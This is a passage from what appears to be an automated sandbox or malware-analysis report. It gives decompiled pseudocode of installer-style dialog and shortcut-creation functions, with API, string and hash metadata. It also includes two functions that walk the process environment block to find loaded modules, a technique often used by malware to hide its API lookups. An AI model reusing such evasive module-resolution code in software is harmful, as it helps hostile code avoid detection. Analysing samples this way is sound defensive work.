                                                • Instruction Fuzzy Hash: 80A17FB1900208ABDB11EFA5CD85AAF77B8EF85314F14843BF701B62D1D77C8A518B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E0040216B(void* __eflags) {
                                                				signed int _t55;
                                                				void* _t59;
                                                				intOrPtr* _t63;
                                                				intOrPtr _t64;
                                                				intOrPtr* _t65;
                                                				intOrPtr* _t67;
                                                				intOrPtr* _t69;
                                                				intOrPtr* _t71;
                                                				intOrPtr* _t73;
                                                				intOrPtr* _t75;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				intOrPtr* _t82;
                                                				intOrPtr* _t84;
                                                				int _t87;
                                                				intOrPtr* _t95;
                                                				signed int _t105;
                                                				signed int _t109;
                                                				void* _t111;
                                                
                                                				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                				_t55 =  *(_t111 - 0x18);
                                                				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                				_t105 = _t55 & 0x00008000;
                                                				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405AD9( *(_t111 - 0xc)) == 0) {
                                                					E00402BCE(0x21);
                                                				}
                                                				_t59 = _t111 + 8;
                                                				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
                                                				if(_t59 < _t87) {
                                                					L15:
                                                					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
                                                					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                					if(_t64 >= _t87) {
                                                						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                						if(_t105 == _t87) {
                                                							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                						}
                                                						if(_t109 != _t87) {
                                                							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                						}
                                                						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                						if( *_t95 != _t87) {
                                                							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                						}
                                                						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                							}
                                                						}
                                                						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                					}
                                                					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L15;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t111 - 4));
                                                				return 0;
                                                			}

                                                APIs
                                                • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 123533781-47812868
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E004027A1(char __ebx, CHAR* __edi, char* __esi) {
                                                				void* _t19;
                                                
                                                				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                					E00406032(__edi, _t6);
                                                					_push(_t19 - 0x1a4);
                                                					_push(__esi);
                                                					E004060D4();
                                                				} else {
                                                					 *((char*)(__edi)) = __ebx;
                                                					 *__esi = __ebx;
                                                					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                				}
                                                				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
                                                				return 0;
                                                			}





                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E1000410A(void* __eflags, intOrPtr* _a4) {
                                                				intOrPtr* _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				signed int _t35;
                                                
                                                				_v16 =  *[fs:0x30];
                                                				_v12 =  *((intOrPtr*)(_v16 + 0xc));
                                                				_v20 =  *((intOrPtr*)(_v12 + 0xc));
                                                				_v8 =  *((intOrPtr*)(_v12 + 0xc));
                                                				while(E10004050(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
                                                					_v8 =  *_v8;
                                                					if(_v8 != _v20) {
                                                						continue;
                                                					}
                                                					return 0;
                                                				}
                                                				return  *((intOrPtr*)(_v8 + 0x28));
                                                			}


                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E10003F0F() {
                                                
                                                				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                			}




                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00404B5D(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				long _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				signed char* _v32;
                                                				int _v36;
                                                				signed int _v44;
                                                				int _v48;
                                                				signed int* _v60;
                                                				signed char* _v64;
                                                				signed int _v68;
                                                				long _v72;
                                                				void* _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t203;
                                                				intOrPtr _t206;
                                                				long _t212;
                                                				signed int _t216;
                                                				signed int _t227;
                                                				void* _t230;
                                                				void* _t231;
                                                				int _t237;
                                                				long _t242;
                                                				long _t243;
                                                				signed int _t244;
                                                				signed int _t250;
                                                				signed int _t252;
                                                				signed char _t253;
                                                				signed char _t259;
                                                				void* _t264;
                                                				void* _t266;
                                                				signed char* _t284;
                                                				signed char _t285;
                                                				long _t290;
                                                				signed int _t300;
                                                				signed int _t308;
                                                				signed char* _t316;
                                                				int _t320;
                                                				int _t321;
                                                				signed int* _t322;
                                                				int _t323;
                                                				long _t324;
                                                				signed int _t325;
                                                				long _t327;
                                                				int _t328;
                                                				signed int _t329;
                                                				void* _t331;
                                                
                                                				_v12 = GetDlgItem(_a4, 0x3f9);
                                                				_v8 = GetDlgItem(_a4, 0x408);
                                                				_t331 = SendMessageA;
                                                				_v24 =  *0x7a2fa8;
                                                				_v28 =  *0x7a2f74 + 0x94;
                                                				_t320 = 0x10;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t298 = _a16;
                                                					} else {
                                                						_a12 = 0;
                                                						_t298 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t298;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                							if(( *0x7a2f7d & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != 0) {
                                                									_t242 = _v16;
                                                									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                									}
                                                									_t243 = _v16;
                                                									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                										_t298 = _v24;
                                                										_t244 =  *(_t243 + 0x5c);
                                                										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t298 = 0 | _a8 != 0x00000413;
                                                								_t250 = E00404AAB(_v8, _a8 != 0x413);
                                                								_t325 = _t250;
                                                								if(_t325 >= 0) {
                                                									_t99 = _v24 + 8; // 0x8
                                                									_t298 = _t250 * 0x418 + _t99;
                                                									_t252 =  *_t298;
                                                									if((_t252 & 0x00000010) == 0) {
                                                										if((_t252 & 0x00000040) == 0) {
                                                											_t253 = _t252 ^ 0x00000001;
                                                										} else {
                                                											_t259 = _t252 ^ 0x00000080;
                                                											if(_t259 >= 0) {
                                                												_t253 = _t259 & 0x000000fe;
                                                											} else {
                                                												_t253 = _t259 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t298 = _t253;
                                                										E0040117D(_t325);
                                                										_a12 = _t325 + 1;
                                                										_a16 =  !( *0x7a2f7c) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t298 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageA(_v8, 0x200, 0, 0);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t230 =  *0x79f54c;
                                                								if(_t230 != 0) {
                                                									ImageList_Destroy(_t230);
                                                								}
                                                								_t231 =  *0x79f560;
                                                								if(_t231 != 0) {
                                                									GlobalFree(_t231);
                                                								}
                                                								 *0x79f54c = 0;
                                                								 *0x79f560 = 0;
                                                								 *0x7a2fe0 = 0;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L90:
                                                								if(_a8 == 0x420 && ( *0x7a2f7d & 0x00000001) != 0) {
                                                									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t321);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                								}
                                                								goto L93;
                                                							} else {
                                                								E004011EF(_t298, 0, 0);
                                                								_t203 = _a12;
                                                								if(_t203 != 0) {
                                                									if(_t203 != 0xffffffff) {
                                                										_t203 = _t203 - 1;
                                                									}
                                                									_push(_t203);
                                                									_push(8);
                                                									E00404B2B();
                                                								}
                                                								if(_a16 == 0) {
                                                									L75:
                                                									E004011EF(_t298, 0, 0);
                                                									_v36 =  *0x79f560;
                                                									_t206 =  *0x7a2fa8;
                                                									_v64 = 0xf030;
                                                									_v24 = 0;
                                                									if( *0x7a2fac <= 0) {
                                                										L86:
                                                										if( *0x7a2f6c == 4) {
                                                											InvalidateRect(_v8, 0, 1);
                                                										}
                                                										if( *((intOrPtr*)( *0x7a273c + 0x10)) != 0) {
                                                											E00404A66(0x3ff, 0xfffffffb, E00404A7E(5));
                                                										}
                                                										goto L90;
                                                									}
                                                									_t322 = _t206 + 8;
                                                									do {
                                                										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                										if(_t212 != 0) {
                                                											_t300 =  *_t322;
                                                											_v72 = _t212;
                                                											_v76 = 8;
                                                											if((_t300 & 0x00000001) != 0) {
                                                												_v76 = 9;
                                                												_v60 =  &(_t322[4]);
                                                												_t322[0] = _t322[0] & 0x000000fe;
                                                											}
                                                											if((_t300 & 0x00000040) == 0) {
                                                												_t216 = (_t300 & 0x00000001) + 1;
                                                												if((_t300 & 0x00000010) != 0) {
                                                													_t216 = _t216 + 3;
                                                												}
                                                											} else {
                                                												_t216 = 3;
                                                											}
                                                											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                										}
                                                										_v24 = _v24 + 1;
                                                										_t322 =  &(_t322[0x106]);
                                                									} while (_v24 <  *0x7a2fac);
                                                									goto L86;
                                                								} else {
                                                									_t323 = E004012E2( *0x79f560);
                                                									E00401299(_t323);
                                                									_t227 = 0;
                                                									_t298 = 0;
                                                									if(_t323 <= 0) {
                                                										L74:
                                                										SendMessageA(_v12, 0x14e, _t298, 0);
                                                										_a16 = _t323;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                											_t298 = _t298 + 1;
                                                										}
                                                										_t227 = _t227 + 1;
                                                									} while (_t227 < _t323);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L93;
                                                						} else {
                                                							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                							if(_t237 == 0xffffffff) {
                                                								goto L93;
                                                							}
                                                							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                								_t324 = 0x20;
                                                							}
                                                							E00401299(_t324);
                                                							SendMessageA(_a4, 0x420, 0, _t324);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = 0;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
                                                				} else {
                                                					_v36 = 0;
                                                					 *0x7a2fe0 = _a4;
                                                					_v20 = 2;
                                                					 *0x79f560 = GlobalAlloc(0x40,  *0x7a2fac << 2);
                                                					_t264 = LoadImageA( *0x7a2f60, 0x6e, 0, 0, 0, 0);
                                                					 *0x79f554 =  *0x79f554 | 0xffffffff;
                                                					_v16 = _t264;
                                                					 *0x79f55c = SetWindowLongA(_v8, 0xfffffffc, E0040516F);
                                                					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                					 *0x79f54c = _t266;
                                                					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                					SendMessageA(_v8, 0x1109, 2,  *0x79f54c);
                                                					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                						SendMessageA(_v8, 0x111b, _t320, 0);
                                                					}
                                                					DeleteObject(_v16);
                                                					_t327 = 0;
                                                					do {
                                                						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                							if(_t327 != 0x20) {
                                                								_v20 = 0;
                                                							}
                                                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E00406167(0, _t327, _t331, 0, _t272)), _t327);
                                                						}
                                                						_t327 = _t327 + 1;
                                                					} while (_t327 < 0x21);
                                                					_t328 = _a16;
                                                					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                					_push(0x15);
                                                					E00404158(_a4);
                                                					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                					_push(0x16);
                                                					E00404158(_a4);
                                                					_t329 = 0;
                                                					_v16 = 0;
                                                					if( *0x7a2fac <= 0) {
                                                						L19:
                                                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t316 = _v24 + 8;
                                                						_v32 = _t316;
                                                						do {
                                                							_t284 =  &(_t316[0x10]);
                                                							if( *_t284 != 0) {
                                                								_v64 = _t284;
                                                								_t285 =  *_t316;
                                                								_v88 = _v16;
                                                								_t308 = 0x20;
                                                								_v84 = 0xffff0002;
                                                								_v80 = 0xd;
                                                								_v68 = _t308;
                                                								_v44 = _t329;
                                                								_v72 = _t285 & _t308;
                                                								if((_t285 & 0x00000002) == 0) {
                                                									if((_t285 & 0x00000004) == 0) {
                                                										 *( *0x79f560 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                									} else {
                                                										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                									}
                                                								} else {
                                                									_v80 = 0x4d;
                                                									_v48 = 1;
                                                									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                									_v36 = 1;
                                                									 *( *0x79f560 + _t329 * 4) = _t290;
                                                									_v16 =  *( *0x79f560 + _t329 * 4);
                                                								}
                                                							}
                                                							_t329 = _t329 + 1;
                                                							_t316 =  &(_v32[0x418]);
                                                							_v32 = _t316;
                                                						} while (_t329 <  *0x7a2fac);
                                                						if(_v36 != 0) {
                                                							L20:
                                                							if(_v20 != 0) {
                                                								E0040418D(_v8);
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E0040418D(_v12);
                                                								L93:
                                                								return E004041BF(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                 			}

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: a2fedb8579bcb52de5b9606b7c8a61a7bcc9cbff960eb8f2c897277819485e7e
                                                • Instruction ID: 01e3f0ac69fe039d53c66122a0ee2819e5ae0f579c243cd3ce02c20529578500
                                                • Opcode Fuzzy Hash: a2fedb8579bcb52de5b9606b7c8a61a7bcc9cbff960eb8f2c897277819485e7e
                                                • Instruction Fuzzy Hash: AC025BB0900209AFDB10DFA8DD45AAE7BB5FB84354F10813AF610BA2E1D7799D52CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E00403C84(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                				struct HWND__* _v32;
                                                				void* _v80;
                                                				void* _v84;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t35;
                                                				signed int _t37;
                                                				signed int _t39;
                                                				struct HWND__* _t49;
                                                				signed int _t68;
                                                				struct HWND__* _t74;
                                                				signed int _t87;
                                                				struct HWND__* _t92;
                                                				signed int _t100;
                                                				int _t104;
                                                				signed int _t116;
                                                				signed int _t117;
                                                				int _t118;
                                                				signed int _t123;
                                                				struct HWND__* _t126;
                                                				struct HWND__* _t127;
                                                				int _t128;
                                                				long _t131;
                                                				int _t133;
                                                				int _t134;
                                                				void* _t135;
                                                				void* _t142;
                                                
                                                				_t116 = _a8;
                                                				if(_t116 == 0x110 || _t116 == 0x408) {
                                                					_t35 = _a12;
                                                					_t126 = _a4;
                                                					__eflags = _t116 - 0x110;
                                                					 *0x79f550 = _t35;
                                                					if(_t116 == 0x110) {
                                                						 *0x7a2f68 = _t126;
                                                						 *0x79f564 = GetDlgItem(_t126, 1);
                                                						_t92 = GetDlgItem(_t126, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x79e530 = _t92;
                                                						E00404158(_t126);
                                                						SetClassLongA(_t126, 0xfffffff2,  *0x7a2748);
                                                						 *0x7a272c = E0040140B(4);
                                                						_t35 = 1;
                                                						__eflags = 1;
                                                						 *0x79f550 = 1;
                                                					}
                                                					_t123 =  *0x40a1dc; // 0xffffffff
                                                					_t134 = 0;
                                                					_t131 = (_t123 << 6) +  *0x7a2fa0;
                                                					__eflags = _t123;
                                                					if(_t123 < 0) {
                                                						L34:
                                                						E004041A4(0x40b);
                                                						while(1) {
                                                							_t37 =  *0x79f550;
                                                							 *0x40a1dc =  *0x40a1dc + _t37;
                                                							_t131 = _t131 + (_t37 << 6);
                                                							_t39 =  *0x40a1dc; // 0xffffffff
                                                							__eflags = _t39 -  *0x7a2fa4;
                                                							if(_t39 ==  *0x7a2fa4) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x7a272c - _t134;
                                                							if( *0x7a272c != _t134) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a1dc -  *0x7a2fa4; // 0xffffffff
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t117 =  *(_t131 + 0x14);
                                                							E00406167(_t117, _t126, _t131, 0x7ab800,  *((intOrPtr*)(_t131 + 0x24)));
                                                							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00404158(_t126);
                                                							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00404158(_t126);
                                                							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00404158(_t126);
                                                							_t49 = GetDlgItem(_t126, 3);
                                                							__eflags =  *0x7a300c - _t134;
                                                							_v32 = _t49;
                                                							if( *0x7a300c != _t134) {
                                                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t117;
                                                							}
                                                							ShowWindow(_t49, _t117 & 0x00000008);
                                                							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                							E0040417A(_t117 & 0x00000002);
                                                							_t118 = _t117 & 0x00000004;
                                                							EnableWindow( *0x79e530, _t118);
                                                							__eflags = _t118 - _t134;
                                                							if(_t118 == _t134) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t134);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                							__eflags =  *0x7a300c - _t134;
                                                							if( *0x7a300c == _t134) {
                                                								_push( *0x79f564);
                                                							} else {
                                                								SendMessageA(_t126, 0x401, 2, _t134);
                                                								_push( *0x79e530);
                                                							}
                                                							E0040418D();
                                                							E004060D4(0x79f568, E00403C65());
                                                							E00406167(0x79f568, _t126, _t131,  &(0x79f568[lstrlenA(0x79f568)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                							SetWindowTextA(_t126, 0x79f568);
                                                							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
                                                							__eflags = _t68;
                                                							if(_t68 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t131 - _t134;
                                                								if( *_t131 == _t134) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t131 + 4) - 5;
                                                								if( *(_t131 + 4) != 5) {
                                                									DestroyWindow( *0x7a2738);
                                                									 *0x79ed40 = _t131;
                                                									__eflags =  *_t131 - _t134;
                                                									if( *_t131 <= _t134) {
                                                										goto L58;
                                                									}
                                                									_t74 = CreateDialogParamA( *0x7a2f60,  *_t131 +  *0x7a2740 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
                                                									__eflags = _t74 - _t134;
                                                									 *0x7a2738 = _t74;
                                                									if(_t74 == _t134) {
                                                										goto L58;
                                                									}
                                                									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                									_push(6);
                                                									E00404158(_t74);
                                                									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                									ScreenToClient(_t126, _t135 + 0x10);
                                                									SetWindowPos( *0x7a2738, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
                                                									__eflags =  *0x7a272c - _t134;
                                                									if( *0x7a272c != _t134) {
                                                										goto L61;
                                                									}
                                                									ShowWindow( *0x7a2738, 8);
                                                									E004041A4(0x405);
                                                									goto L58;
                                                								}
                                                								__eflags =  *0x7a300c - _t134;
                                                								if( *0x7a300c != _t134) {
                                                									goto L61;
                                                								}
                                                								__eflags =  *0x7a3000 - _t134;
                                                								if( *0x7a3000 != _t134) {
                                                									continue;
                                                								}
                                                								goto L61;
                                                							}
                                                						}
                                                						DestroyWindow( *0x7a2738);
                                                						 *0x7a2f68 = _t134;
                                                						EndDialog(_t126,  *0x79e938);
                                                						goto L58;
                                                					} else {
                                                						__eflags = _t35 - 1;
                                                						if(_t35 != 1) {
                                                							L33:
                                                							__eflags =  *_t131 - _t134;
                                                							if( *_t131 == _t134) {
                                                								goto L61;
                                                							}
                                                							goto L34;
                                                						}
                                                						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
                                                						__eflags = _t87;
                                                						if(_t87 == 0) {
                                                							goto L33;
                                                						}
                                                						SendMessageA( *0x7a2738, 0x40f, 0, 1);
                                                						__eflags =  *0x7a272c;
                                                						return 0 |  *0x7a272c == 0x00000000;
                                                					}
                                                				} else {
                                                					_t126 = _a4;
                                                					_t134 = 0;
                                                					if(_t116 == 0x47) {
                                                						SetWindowPos( *0x79f548, _t126, 0, 0, 0, 0, 0x13);
                                                					}
                                                					if(_t116 == 5) {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x79f548,  ~(_a12 - 1) & _t116);
                                                					}
                                                					if(_t116 != 0x40d) {
                                                						__eflags = _t116 - 0x11;
                                                						if(_t116 != 0x11) {
                                                							__eflags = _t116 - 0x111;
                                                							if(_t116 != 0x111) {
                                                								L26:
                                                								return E004041BF(_t116, _a12, _a16);
                                                							}
                                                							_t133 = _a12 & 0x0000ffff;
                                                							_t127 = GetDlgItem(_t126, _t133);
                                                							__eflags = _t127 - _t134;
                                                							if(_t127 == _t134) {
                                                								L13:
                                                								__eflags = _t133 - 1;
                                                								if(_t133 != 1) {
                                                									__eflags = _t133 - 3;
                                                									if(_t133 != 3) {
                                                										_t128 = 2;
                                                										__eflags = _t133 - _t128;
                                                										if(_t133 != _t128) {
                                                											L25:
                                                											SendMessageA( *0x7a2738, 0x111, _a12, _a16);
                                                											goto L26;
                                                										}
                                                										__eflags =  *0x7a300c - _t134;
                                                										if( *0x7a300c == _t134) {
                                                											_t100 = E0040140B(3);
                                                											__eflags = _t100;
                                                											if(_t100 != 0) {
                                                												goto L26;
                                                											}
                                                											 *0x79e938 = 1;
                                                											L21:
                                                											_push(0x78);
                                                											L22:
                                                											E00404131();
                                                											goto L26;
                                                										}
                                                										E0040140B(_t128);
